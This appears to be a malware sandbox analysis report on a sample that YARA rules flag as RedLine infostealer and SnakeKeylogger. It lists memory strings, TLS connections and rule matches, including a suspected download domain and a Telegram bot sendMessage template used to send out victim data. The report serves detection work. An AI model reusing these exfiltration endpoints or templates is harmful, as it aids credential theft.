Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BA7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: nhpoymuP.pif, 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BA7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FBE000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BA7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BA7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20a
Source: nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CCF000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BCC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FDE000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: image.exe, 00000000.00000002.1741511764.0000000020BDD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fodoknotel.za.com/233_Pumyophnre
Source: image.exe, 00000000.00000002.1741511764.0000000020BF3000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1711881761.000000000084B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fodoknotel.za.com/233_Pumyophnrer
Source: image.exe, 00000000.00000002.1711881761.000000000084B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fodoknotel.za.com/d
Source: image.exe, 00000000.00000002.1711881761.000000000089A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fodoknotel.za.com:443/233_Pumyophnrerhv
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027B74000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027B7F000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BA7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FBE000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025F24000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025F94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: nhpoymuP.pif, 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025F24000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025F94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027B74000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027B7F000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027B2F000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BA7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FBE000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025F4E000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025F94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C70000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2973878513.000000002A705000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000026081000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2974026107.0000000028E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: nhpoymuP.pif, 00000007.00000002.2969311165.0000000028C9D000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028CC5000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028AEC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028C4F000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028DA6000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BCC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028EE6000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000270D4000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000272F6000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000270AD000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FDE000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000271B5000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000026EFC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.000000002705F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E9E000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028C56000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028D81000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028CA0000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028AC7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028C2B000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.000000002703B000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027191000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027066000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000272AE000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000026ED7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000270B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: nhpoymuP.pif, 00000007.00000002.2969311165.0000000028C9D000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028CC5000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028AEC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028C4F000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028DA6000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BCC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028EE6000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000270D4000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000272F6000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000270AD000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FDE000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000271B5000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000026EFC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.000000002705F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E9E000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028C56000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028D81000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028CA0000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028AC7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028C2B000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.000000002703B000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027191000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027066000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000272AE000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000026ED7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000270B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CCA000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 23.237.26.135:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49772 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.1.nhpoymuP.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.nhpoymuP.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.1.nhpoymuP.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.1.nhpoymuP.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.nhpoymuP.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.1.nhpoymuP.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.nhpoymuP.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.1.nhpoymuP.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.nhpoymuP.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.nhpoymuP.pif.28470000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.nhpoymuP.pif.28470000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.nhpoymuP.pif.28470000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.nhpoymuP.pif.31c30000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.31c30000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.nhpoymuP.pif.31c30000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.nhpoymuP.pif.31c30ee8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.31c30ee8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.nhpoymuP.pif.31c30ee8.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.nhpoymuP.pif.27840000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.nhpoymuP.pif.27840000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.nhpoymuP.pif.27840000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.1.nhpoymuP.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.nhpoymuP.pif.2f3499de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.nhpoymuP.pif.28470000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.2f3499de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.nhpoymuP.pif.28470000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.nhpoymuP.pif.2f3499de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.nhpoymuP.pif.28470000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.nhpoymuP.pif.25d299de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.3.nhpoymuP.pif.240bcc58.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.3.nhpoymuP.pif.240bcc58.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.nhpoymuP.pif.240bcc58.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.nhpoymuP.pif.25d299de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.nhpoymuP.pif.25d299de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.nhpoymuP.pif.25d2a8c6.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.nhpoymuP.pif.27840ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.nhpoymuP.pif.27840ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.nhpoymuP.pif.27840ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.3.nhpoymuP.pif.2d7ca218.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.3.nhpoymuP.pif.25817960.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.3.nhpoymuP.pif.25817960.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.3.nhpoymuP.pif.25817960.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.nhpoymuP.pif.25d299de.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.nhpoymuP.pif.284d0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.nhpoymuP.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.nhpoymuP.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
